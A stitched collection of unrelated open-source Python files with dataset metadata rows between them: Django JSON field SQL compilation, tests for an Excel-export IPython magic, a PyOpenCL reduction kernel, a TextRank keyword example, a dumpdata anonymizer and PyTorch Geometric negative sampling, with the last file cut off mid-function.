arg_sql, arg_params = compiler.compile(self.source_expression)
params.extend(arg_params)
json_path = postgres_compile_json_path(self.path)
params.append(json_path)
template = '{} #> %s'.format(arg_sql)
return template, params
def as_mysql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
params = []
arg_sql, arg_params = compiler.compile(self.source_expression)
params.extend(arg_params)
json_path = mysql_compile_json_path(self.path)
params.append(json_path)
template = 'JSON_EXTRACT({}, %s)'.format(arg_sql)
return template, params
def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
raise NotSupportedError(
'Functions on JSONFields are only supported on PostgreSQL and MySQL at the moment.'
)
def copy(self):
c = super().copy()
c.source_expression = copy.copy(self.source_expression)
c.extra = self.extra.copy()
return c
| 41.163265
| 116
| 0.695092
| 248
| 2,017
| 5.407258
| 0.282258
| 0.047726
| 0.044743
| 0.067114
| 0.447427
| 0.447427
| 0.418345
| 0.418345
| 0.418345
| 0.36167
| 0
| 0.000625
| 0.206247
| 2,017
| 48
| 117
| 42.020833
| 0.836977
| 0
| 0
| 0.3
| 0
| 0
| 0.054041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.1
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d99db002da009becee8998564d797726db9d1f
| 6,460
|
py
|
Python
|
excelify/tests.py
|
pmbaumgartner/excelify
|
c0e29733efe407248810c3a8d3ec874f0cc0daca
|
[
"MIT"
] | 11
|
2018-02-12T16:57:26.000Z
|
2021-03-12T03:04:53.000Z
|
excelify/tests.py
|
pmbaumgartner/excelify
|
c0e29733efe407248810c3a8d3ec874f0cc0daca
|
[
"MIT"
] | 1
|
2018-02-04T20:53:35.000Z
|
2018-02-04T22:08:35.000Z
|
excelify/tests.py
|
pmbaumgartner/excelify
|
c0e29733efe407248810c3a8d3ec874f0cc0daca
|
[
"MIT"
] | null | null | null |
import unittest
import tempfile
import pathlib
import datetime
import warnings
from IPython.testing.globalipapp import start_ipython, get_ipython
import pandas.util.testing as tm
from pandas.core.frame import DataFrame
from pandas.core.series import Series
from pandas import read_excel
import pytest
ip = get_ipython()
ip.magic('load_ext excelify')
class TestMagicExportImport(unittest.TestCase):
def setUp(self):
self.tempexcel = tempfile.NamedTemporaryFile(suffix='.xlsx')
def test_series(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_series = read_excel(excel_name, squeeze=True, dtype=series.dtype)
tm.assert_series_equal(series, loaded_series, check_names=False)
def test_dataframe(self):
df = DataFrame()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'df -f {filepath}'.format(filepath=excel_name))
loaded_df = read_excel(excel_name, dtype=df.dtypes)
tm.assert_frame_equal(df, loaded_df, check_names=False)
def test_sheet_name(self):
series = Series()
excel_name = self.tempexcel.name
sheetname = 'test_sheet_name'
ip.run_line_magic('excel', 'series -f {filepath} -s {sheetname}'.format(filepath=excel_name, sheetname=sheetname))
loaded_excel = read_excel(excel_name, sheet_name=None)
assert 'test_sheet_name' in loaded_excel
def test_all_pandas_objects(self):
df1 = DataFrame()
df2 = DataFrame()
series1 = Series()
series2 = Series()
pandas_objects = [(name, obj) for (name, obj) in locals().items()
if isinstance(obj, (DataFrame, Series))]
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
for (name, obj) in pandas_objects:
if isinstance(obj, Series):
loaded_data = read_excel(excel_name, sheet_name=name, squeeze=True, dtype=obj.dtype)
tm.assert_series_equal(obj, loaded_data, check_names=False)
elif isinstance(obj, DataFrame):
loaded_data = read_excel(excel_name, sheet_name=name, dtype=obj.dtypes)
tm.assert_frame_equal(obj, loaded_data, check_names=False)
def test_sheet_timestamp(self):
series = Series()
excel_name = self.tempexcel.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
loaded_excel = read_excel(excel_name, sheet_name=None)
sheet_names = list(loaded_excel.keys())
for sheet in sheet_names:
_, date_string = sheet.split('_')
saved_date = datetime.datetime.strptime(date_string, "%Y%m%d-%H%M%S")
load_to_read = datetime.datetime.now() - saved_date
# there is probably a better way to test this
assert load_to_read.seconds < 10
def test_all_long_name(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
locals().update({'a' * 33 : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_provided(self):
with warnings.catch_warnings(record=True) as w:
series = Series()
excel_name = self.tempexcel.name
longsheet = 'a' * 33
ip.run_line_magic('excel', 'series -f {filepath} -s {longsheet}'.format(filepath=excel_name, longsheet=longsheet))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def test_long_name_default(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
longsheet = 'a' * 33
locals().update({longsheet : Series()})
excel_name = self.tempexcel.name
ip.run_line_magic('excel', '{longsheet} -f {filepath}'.format(longsheet=longsheet, filepath=excel_name))
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert "truncated" in str(w[-1].message)
def tearDown(self):
self.tempexcel.close()
def test_filename():
series = Series()
ip.run_line_magic('excel', 'series')
excel_name = list(pathlib.Path().glob('series_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
def test_all_filename():
series = Series()
df = DataFrame()
ip.run_line_magic('excel_all', '')
excel_name = list(pathlib.Path().glob('all_data_*.xlsx'))[0]
assert excel_name.exists()
excel_name.unlink()
@pytest.fixture
def no_extension_file():
file = tempfile.NamedTemporaryFile()
yield file
file.close()
def test_filepath_append(no_extension_file):
series = Series()
excel_name = no_extension_file.name
ip.run_line_magic('excel', 'series -f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_all_filepath_append(no_extension_file):
series = Series()
df = DataFrame()
excel_name = no_extension_file.name
ip.run_line_magic('excel_all', '-f {filepath}'.format(filepath=excel_name))
exported_filepath = pathlib.Path(excel_name + '.xlsx')
exported_filepath = pathlib.PurePath(excel_name + '.xlsx')
assert exported_filepath.suffix == '.xlsx'
def test_no_object():
with pytest.raises(NameError):
ip.run_line_magic('excel', 'nonexistantobject')
def test_non_pandas_object():
integer = 3
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'integer')
string = 'string'
with pytest.raises(TypeError):
ip.run_line_magic('excel', 'string')
def test_all_no_objects():
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
def test_all_too_many_objects():
# this seems like a bad idea...
for i in range(102):
locals().update({'series' + str(i) : Series()})
with pytest.raises(RuntimeError):
ip.run_line_magic('excel_all', '')
| 37.34104
| 126
| 0.658204
| 818
| 6,460
| 4.964548
| 0.185819
| 0.077567
| 0.037675
| 0.058606
| 0.574243
| 0.54297
| 0.508003
| 0.452844
| 0.442502
| 0.327013
| 0
| 0.005375
| 0.222446
| 6,460
| 172
| 127
| 37.55814
| 0.803106
| 0.0113
| 0
| 0.422535
| 0
| 0
| 0.08272
| 0
| 0
| 0
| 0
| 0
| 0.133803
| 1
| 0.133803
| false
| 0
| 0.084507
| 0
| 0.225352
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60db6ae3957694fa22eea77ea766c2665fc6212f
| 13,015
|
py
|
Python
|
gputools/core/oclmultireduction.py
|
gmazzamuto/gputools
|
73a4dee76a119f94d8163781a85b691fd080d506
|
[
"BSD-3-Clause"
] | 89
|
2015-08-28T14:17:33.000Z
|
2022-01-20T16:19:34.000Z
|
gputools/core/oclmultireduction.py
|
gmazzamuto/gputools
|
73a4dee76a119f94d8163781a85b691fd080d506
|
[
"BSD-3-Clause"
] | 24
|
2015-08-28T19:06:22.000Z
|
2022-02-21T21:10:13.000Z
|
gputools/core/oclmultireduction.py
|
gmazzamuto/gputools
|
73a4dee76a119f94d8163781a85b691fd080d506
|
[
"BSD-3-Clause"
] | 17
|
2015-08-28T18:56:43.000Z
|
2021-09-15T23:15:36.000Z
|
"""
an adaptation of pyopencl's reduction kernel for weighted avarages
like sum(a*b)
mweigert@mpi-cbg.de
"""
from __future__ import print_function, unicode_literals, absolute_import, division
from six.moves import zip
import pyopencl as cl
from pyopencl.tools import (
context_dependent_memoize,
dtype_to_ctype, KernelTemplateBase,
_process_code_for_macro)
import numpy as np
from gputools import get_device
import sys
# {{{ kernel source
KERNEL = r"""//CL//
<%
inds = range(len(map_exprs))
%>
#define GROUP_SIZE ${group_size}
% for i,m in enumerate(map_exprs):
#define READ_AND_MAP_${i}(i) (${m})
% endfor
#define REDUCE(a, b) (${reduce_expr})
% if double_support:
#if __OPENCL_C_VERSION__ < 120
#pragma OPENCL EXTENSION cl_khr_fp64: enable
#endif
#define PYOPENCL_DEFINE_CDOUBLE
% endif
#include <pyopencl-complex.h>
${preamble}
typedef ${out_type} out_type;
__kernel void ${name}(
% for i in inds:
__global out_type *out__base_${i},
% endfor
long out__offset, ${arguments},
unsigned int seq_count, unsigned int n)
{
% for i in inds:
__global out_type *out_${i} = (__global out_type *) (
(__global char *) out__base_${i} + out__offset);
% endfor
${arg_prep}
% for i in inds:
__local out_type ldata_${i}[GROUP_SIZE];
out_type acc_${i} = ${neutral};
% endfor
unsigned int lid = get_local_id(0);
unsigned int i = get_group_id(0)*GROUP_SIZE*seq_count + lid;
//printf("seq: %d\tlid = %d\ti=%d\n",seq_count,lid,i);
for (unsigned s = 0; s < seq_count; ++s)
{
if (i >= n)
break;
% for i in inds:
acc_${i} = REDUCE(acc_${i}, READ_AND_MAP_${i}(i));
% endfor
i += GROUP_SIZE;
}
% for i in inds:
ldata_${i}[lid] = acc_${i};
% endfor
<%
cur_size = group_size
%>
% while cur_size > 1:
barrier(CLK_LOCAL_MEM_FENCE);
<%
new_size = cur_size // 2
assert new_size * 2 == cur_size
%>
if (lid < ${new_size})
{
% for i in inds:
ldata_${i}[lid] = REDUCE(
ldata_${i}[lid],
ldata_${i}[lid + ${new_size}]);
% endfor
}
<% cur_size = new_size %>
% endwhile
if (lid == 0) {
% for i in inds:
out_${i}[get_group_id(0)] = ldata_${i}[0];
% endfor
//printf("result: %.4f\n",out_0[get_group_id(0)] );
}
}
"""
def _get_reduction_source(
ctx, out_type, out_type_size,
neutral, reduce_expr, map_exprs, parsed_args,
name="reduce_kernel", preamble="", arg_prep="",
device=None, max_group_size=None):
if device is not None:
devices = [device]
else:
devices = ctx.devices
# {{{ compute group size
def get_dev_group_size(device):
# dirty fix for the RV770 boards
max_work_group_size = device.max_work_group_size
if "RV770" in device.name:
max_work_group_size = 64
# compute lmem limit
from pytools import div_ceil
lmem_wg_size = div_ceil(max_work_group_size, out_type_size)
result = min(max_work_group_size, lmem_wg_size)
# round down to power of 2
from pyopencl.tools import bitlog2
return 2**bitlog2(result)
group_size = min(get_dev_group_size(dev) for dev in devices)
if max_group_size is not None:
group_size = min(max_group_size, group_size)
# }}}
from mako.template import Template
from pytools import all
from pyopencl.characterize import has_double_support
src = str(Template(KERNEL).render(
out_type=out_type,
arguments=", ".join(arg.declarator() for arg in parsed_args),
group_size=group_size,
neutral=neutral,
reduce_expr=_process_code_for_macro(reduce_expr),
map_exprs=[_process_code_for_macro(m) for m in map_exprs],
name=name,
preamble=preamble,
arg_prep=arg_prep,
double_support=all(has_double_support(dev) for dev in devices),
))
# sys.exit()
from pytools import Record
class ReductionInfo(Record):
pass
return ReductionInfo(
context=ctx,
source=src,
group_size=group_size)
def get_reduction_kernel(stage,
ctx, dtype_out,
neutral, reduce_expr, arguments=None,
name="reduce_kernel", preamble="",
map_exprs = None,
device=None, options=[], max_group_size=None):
if map_exprs is None:
raise ValueError("map_exprs has to be given!")
for i, m in enumerate(map_exprs):
if m is None:
if stage==2:
map_exprs[i] = "pyopencl_reduction_inp_%i[i]"%i
else:
map_exprs[i] = "in[i]"
from pyopencl.tools import (
parse_arg_list, get_arg_list_scalar_arg_dtypes,
get_arg_offset_adjuster_code, VectorArg)
arg_prep = ""
if stage==1 and arguments is not None:
arguments = parse_arg_list(arguments, with_offset=True)
arg_prep = get_arg_offset_adjuster_code(arguments)
if stage==2 and arguments is not None:
arguments = parse_arg_list(arguments)
arguments = (
[VectorArg(dtype_out, "pyopencl_reduction_inp_%i"%i) for i in range(len(map_exprs))]
+arguments)
inf = _get_reduction_source(
ctx, dtype_to_ctype(dtype_out), dtype_out.itemsize,
neutral, reduce_expr, map_exprs, arguments,
name, preamble, arg_prep, device, max_group_size)
inf.program = cl.Program(ctx, inf.source)
inf.program.build(options)
inf.kernel = getattr(inf.program, name)
inf.arg_types = arguments
inf.kernel.set_scalar_arg_dtypes(
[None, ]*len(map_exprs)+[np.int64]
+get_arg_list_scalar_arg_dtypes(inf.arg_types)
+[np.uint32]*2)
return inf
# }}}
# {{{ main reduction kernel
class OCLMultiReductionKernel:
"""
simultanous reduction of a weighted sum of severalbuffers
example:
k = OCLMultiReduction(np.float32,
neutral="0",reduce_expr="a+b",
map_exprs = ["x[i]", "x[i]*y[i]"],
arguments="__global float *x,__global float *y")
k(a,b, out1 = out1, out2 = out2)
"""
def __init__(self, dtype_out,
neutral, reduce_expr, arguments=None,
map_exprs=[None],
name="reduce_kernel", options=[], preamble=""):
ctx = get_device().context
dtype_out = self.dtype_out = np.dtype(dtype_out)
max_group_size = None
trip_count = 0
self.n_exprs = len(map_exprs)
assert self.n_exprs>0
while True:
self.stage_1_inf = get_reduction_kernel(1, ctx,
dtype_out,
neutral, reduce_expr, arguments,
name=name+"_stage1", options=options, preamble=preamble,
map_exprs=map_exprs,
max_group_size=max_group_size)
kernel_max_wg_size = self.stage_1_inf.kernel.get_work_group_info(
cl.kernel_work_group_info.WORK_GROUP_SIZE,
ctx.devices[0])
if self.stage_1_inf.group_size<=kernel_max_wg_size:
break
else:
max_group_size = kernel_max_wg_size
trip_count += 1
assert trip_count<=2
self.stage_2_inf = get_reduction_kernel(2, ctx,
dtype_out,
neutral, reduce_expr, arguments=arguments,
name=name+"_stage2", options=options,
map_exprs = [None]*self.n_exprs,
preamble=preamble,
max_group_size=max_group_size)
from pytools import any
from pyopencl.tools import VectorArg
assert any(
isinstance(arg_tp, VectorArg)
for arg_tp in self.stage_1_inf.arg_types), \
"ReductionKernel can only be used with functions " \
"that have at least one vector argument"
def __call__(self, *args, **kwargs):
MAX_GROUP_COUNT = 1024 # noqa
SMALL_SEQ_COUNT = 4 # noqa
from pyopencl.array import empty
stage_inf = self.stage_1_inf
queue = kwargs.pop("queue", None)
wait_for = kwargs.pop("wait_for", None)
return_event = kwargs.pop("return_event", False)
outs = kwargs.pop("outs", [None]*self.n_exprs)
if kwargs:
raise TypeError("invalid keyword argument to reduction kernel")
stage1_args = args
while True:
invocation_args = []
vectors = []
from pyopencl.tools import VectorArg
for arg, arg_tp in zip(args, stage_inf.arg_types):
if isinstance(arg_tp, VectorArg):
if not arg.flags.forc:
raise RuntimeError("ReductionKernel cannot "
"deal with non-contiguous arrays")
vectors.append(arg)
invocation_args.append(arg.base_data)
if arg_tp.with_offset:
invocation_args.append(arg.offset)
else:
invocation_args.append(arg)
repr_vec = vectors[0]
sz = repr_vec.size
if queue is not None:
use_queue = queue
else:
use_queue = repr_vec.queue
if sz<=stage_inf.group_size*SMALL_SEQ_COUNT*MAX_GROUP_COUNT:
total_group_size = SMALL_SEQ_COUNT*stage_inf.group_size
group_count = (sz+total_group_size-1)//total_group_size
seq_count = SMALL_SEQ_COUNT
else:
group_count = MAX_GROUP_COUNT
macrogroup_size = group_count*stage_inf.group_size
seq_count = (sz+macrogroup_size-1)//macrogroup_size
if group_count==1:
results = [empty(use_queue,
(), self.dtype_out,
allocator=repr_vec.allocator) if out is None else out for out in outs]
else:
results = [empty(use_queue,
(group_count,), self.dtype_out,
allocator=repr_vec.allocator) for out in outs]
last_evt = stage_inf.kernel(
use_queue,
(group_count*stage_inf.group_size,),
(stage_inf.group_size,),
*([r.base_data for r in results]+[results[0].offset,]
+invocation_args+[seq_count, sz]),
**dict(wait_for=wait_for))
wait_for = [last_evt]
#print "ooooo ", group_count, len(args)
if group_count==1:
if return_event:
return results, last_evt
else:
return results
else:
stage_inf = self.stage_2_inf
args = tuple(results)+stage1_args
#args = (results[0],)+stage1_args
if __name__=='__main__':
from gputools import OCLArray, OCLReductionKernel
k1 = OCLReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_expr="x[i]",
arguments="__global float *x")
k2 = OCLMultiReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_exprs=["y[i]*x[i]","x[i]"],
arguments="__global float *x, __global float *y")
N = 512
a = OCLArray.from_array(np.ones((N,N),np.float32))
b = OCLArray.from_array(2.*np.ones((N,N),np.float32))
o1 = OCLArray.empty((),np.float32)
o2 = OCLArray.empty((),np.float32)
from time import time
t = time()
for _ in range(400):
k1(a)
k1(b)
k1(a).get()
k1(b).get()
print(time()-t)
t = time()
#print k2(a,b, outs = [o1,o2])
for _ in range(400):
k2(a[0],b[0], outs = [o1,o2])
o1.get()
print(time()-t)
# open("kern_new_1.txt","w").write(("%s"%k2.stage_1_inf).replace("\\n","\n"))
# open("kern_new_2.txt","w").write(("%s"%k2.stage_2_inf).replace("\\n","\n"))
| 28.417031
| 108
| 0.542374
| 1,553
| 13,015
| 4.251127
| 0.188023
| 0.057255
| 0.019994
| 0.010603
| 0.203878
| 0.145259
| 0.106483
| 0.05665
| 0.031506
| 0.026659
| 0
| 0.0146
| 0.357972
| 13,015
| 457
| 109
| 28.479212
| 0.775491
| 0.063388
| 0
| 0.18543
| 0
| 0.003311
| 0.224889
| 0.02573
| 0
| 0
| 0
| 0
| 0.013245
| 1
| 0.016556
| false
| 0.003311
| 0.066225
| 0
| 0.10596
| 0.016556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60de65cd7b893d039ce64092d8888cd693558525
| 831
|
py
|
Python
|
example/example01.py
|
ChenglongChen/TextRank4ZH
|
5af7b9d33d9e686411576362dfccf6f9d3d3282b
|
[
"MIT"
] | 2
|
2016-09-08T11:39:09.000Z
|
2016-11-29T14:04:38.000Z
|
example/example01.py
|
ChenglongChen/TextRank4ZH
|
5af7b9d33d9e686411576362dfccf6f9d3d3282b
|
[
"MIT"
] | null | null | null |
example/example01.py
|
ChenglongChen/TextRank4ZH
|
5af7b9d33d9e686411576362dfccf6f9d3d3282b
|
[
"MIT"
] | 5
|
2017-03-03T03:18:32.000Z
|
2018-09-18T02:46:27.000Z
|
#-*- encoding:utf-8 -*-
from __future__ import print_function
import sys
try:
reload(sys)
sys.setdefaultencoding('utf-8')
except:
pass
import codecs
from textrank4zh import TextRank4Keyword, TextRank4Sentence
text = codecs.open('../test/doc/01.txt', 'r', 'utf-8').read()
tr4w = TextRank4Keyword()
tr4w.analyze(text=text, lower=True, window=2) # py2中text必须是utf8编码的str或者unicode对象,py3中必须是utf8编码的bytes或者str对象
print( '关键词:' )
for item in tr4w.get_keywords(20, word_min_len=1):
print(item.word, item.weight)
print()
print( '关键短语:' )
for phrase in tr4w.get_keyphrases(keywords_num=20, min_occur_num= 2):
print(phrase)
tr4s = TextRank4Sentence()
tr4s.analyze(text=text, lower=True, source = 'all_filters')
print()
print( '摘要:' )
for item in tr4s.get_key_sentences(num=3):
print(item.weight, item.sentence)
| 24.441176
| 109
| 0.731649
| 113
| 831
| 5.247788
| 0.530973
| 0.020236
| 0.05059
| 0.067454
| 0.080944
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.127557
| 831
| 34
| 110
| 24.441176
| 0.777931
| 0.098676
| 0
| 0.08
| 0
| 0
| 0.069519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.04
| 0.16
| 0
| 0.16
| 0.36
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60de82d5bb8ba90b967a1ecc746d150756ee64d4
| 1,833
|
py
|
Python
|
scripts/anonymize_dumpdata.py
|
suutari-ai/respa
|
a944b1c13f855eaf5f883687b5fd025ece7c8176
|
[
"MIT"
] | 1
|
2018-11-13T06:03:27.000Z
|
2018-11-13T06:03:27.000Z
|
scripts/anonymize_dumpdata.py
|
suutari-ai/respa
|
a944b1c13f855eaf5f883687b5fd025ece7c8176
|
[
"MIT"
] | 1
|
2020-06-12T08:58:58.000Z
|
2020-06-12T08:58:58.000Z
|
scripts/anonymize_dumpdata.py
|
suutari-ai/respa
|
a944b1c13f855eaf5f883687b5fd025ece7c8176
|
[
"MIT"
] | null | null | null |
import random
import uuid
import sys
import json
from faker import Factory
from faker.providers.person.fi_FI import Provider as PersonProvider
fake = Factory.create('fi_FI')
email_by_user = {}
users_by_id = {}
def anonymize_users(users):
usernames = set()
emails = set()
for data in users:
if data['model'] != 'users.user':
continue
user = data['fields']
user['password'] = "!"
username = fake.user_name()
while username in usernames:
username = fake.user_name()
usernames.add(username)
user['username'] = username
user['uuid'] = str(uuid.uuid4())
if user['first_name']:
user['first_name'] = fake.first_name()
if user['last_name']:
user['last_name'] = fake.last_name()
user['email'] = fake.email()
email_by_user[data['pk']] = user['email']
users_by_id[data['pk']] = user
def remove_secrets(data):
for model in data:
fields = model['fields']
if model['model'] == 'socialaccount.socialapp':
fields['client_id'] = fake.md5()
fields['secret'] = fake.md5()
elif model['model'] == 'socialaccount.socialapp':
fields['token_secret'] = fake.md5()
fields['token'] = fake.md5()
elif model['model'] == 'account.emailaddress':
fields['email'] = email_by_user[fields['user']]
elif model['model'] == 'socialaccount.socialaccount':
fields['extra_data'] = '{}'
fields['uid'] = users_by_id[fields['user']]['uuid']
elif model['model'] == 'sessions.session':
fields['session_data'] = "!"
model['pk'] = fake.md5()
data = json.load(sys.stdin)
anonymize_users(data)
remove_secrets(data)
json.dump(data, sys.stdout, indent=4)
| 31.067797
| 67
| 0.582106
| 213
| 1,833
| 4.868545
| 0.300469
| 0.048216
| 0.054002
| 0.038573
| 0.104147
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005178
| 0.262411
| 1,833
| 58
| 68
| 31.603448
| 0.761834
| 0
| 0
| 0.039216
| 0
| 0
| 0.173486
| 0.039825
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0.019608
| 0.117647
| 0
| 0.156863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ded314d6e25af4b6bb277bc0ff9652a4d9cb93
| 12,252
|
py
|
Python
|
torch_geometric/utils/negative_sampling.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,350
|
2021-09-12T08:32:50.000Z
|
2022-03-31T18:09:36.000Z
|
torch_geometric/utils/negative_sampling.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 588
|
2021-09-12T08:49:08.000Z
|
2022-03-31T21:02:13.000Z
|
torch_geometric/utils/negative_sampling.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 505
|
2021-09-13T13:13:32.000Z
|
2022-03-31T15:54:00.000Z
|
import random
from typing import Optional, Tuple, Union
import numpy as np
import torch
from torch import Tensor
from torch_geometric.utils import coalesce, degree, remove_self_loops
from .num_nodes import maybe_num_nodes
def negative_sampling(edge_index: Tensor,
num_nodes: Optional[Union[int, Tuple[int, int]]] = None,
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False) -> Tensor:
r"""Samples random negative edges of a graph given by :attr:`edge_index`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int or Tuple[int, int], optional): The number of nodes,
*i.e.* :obj:`max_val + 1` of :attr:`edge_index`.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph with shape :obj:`(num_src_nodes, num_dst_nodes)`.
(default: :obj:`None`)
num_neg_samples (int, optional): The (approximate) number of negative
samples to return.
If set to :obj:`None`, will try to return a negative edge for every
positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
assert method in ['sparse', 'dense']
size = num_nodes
bipartite = isinstance(size, (tuple, list))
size = maybe_num_nodes(edge_index) if size is None else size
size = (size, size) if not bipartite else size
force_undirected = False if bipartite else force_undirected
idx, population = edge_index_to_vector(edge_index, size, bipartite,
force_undirected)
if idx.numel() >= population:
return edge_index.new_empty((2, 0))
if num_neg_samples is None:
num_neg_samples = edge_index.size(1)
if force_undirected:
num_neg_samples = num_neg_samples // 2
prob = 1. - idx.numel() / population # Probability to sample a negative.
sample_size = int(1.1 * num_neg_samples / prob) # (Over)-sample size.
neg_idx = None
if method == 'dense':
# The dense version creates a mask of shape `population` to check for
# invalid samples.
mask = idx.new_ones(population, dtype=torch.bool)
mask[idx] = False
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, idx.device)
rnd = rnd[mask[rnd]] # Filter true negatives.
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
mask[neg_idx] = False
else: # 'sparse'
# The sparse version checks for invalid samples via `np.isin`.
idx = idx.to('cpu')
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, device='cpu')
mask = np.isin(rnd, idx)
if neg_idx is not None:
mask |= np.isin(rnd, neg_idx.to('cpu'))
mask = torch.from_numpy(mask).to(torch.bool)
rnd = rnd[~mask].to(edge_index.device)
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
return vector_to_edge_index(neg_idx, size, bipartite, force_undirected)
def batched_negative_sampling(
edge_index: Tensor,
batch: Union[Tensor, Tuple[Tensor, Tensor]],
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False,
) -> Tensor:
r"""Samples random negative edges of multiple graphs given by
:attr:`edge_index` and :attr:`batch`.
Args:
edge_index (LongTensor): The edge indices.
batch (LongTensor or Tuple[LongTensor, LongTensor]): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph connecting two different node types.
num_neg_samples (int, optional): The number of negative samples to
return. If set to :obj:`None`, will try to return a negative edge
for every positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
if isinstance(batch, Tensor):
src_batch, dst_batch = batch, batch
else:
src_batch, dst_batch = batch[0], batch[1]
split = degree(src_batch[edge_index[0]], dtype=torch.long).tolist()
edge_indices = torch.split(edge_index, split, dim=1)
num_src = degree(src_batch, dtype=torch.long)
cum_src = torch.cat([src_batch.new_zeros(1), num_src.cumsum(0)[:-1]])
if isinstance(batch, Tensor):
num_nodes = num_src.tolist()
cumsum = cum_src
else:
num_dst = degree(dst_batch, dtype=torch.long)
cum_dst = torch.cat([dst_batch.new_zeros(1), num_dst.cumsum(0)[:-1]])
num_nodes = torch.stack([num_src, num_dst], dim=1).tolist()
cumsum = torch.stack([cum_src, cum_dst], dim=1).unsqueeze(-1)
neg_edge_indices = []
for i, edge_index in enumerate(edge_indices):
edge_index = edge_index - cumsum[i]
neg_edge_index = negative_sampling(edge_index, num_nodes[i],
num_neg_samples, method,
force_undirected)
neg_edge_index += cumsum[i]
neg_edge_indices.append(neg_edge_index)
return torch.cat(neg_edge_indices, dim=1)
def structured_negative_sampling(edge_index, num_nodes: Optional[int] = None,
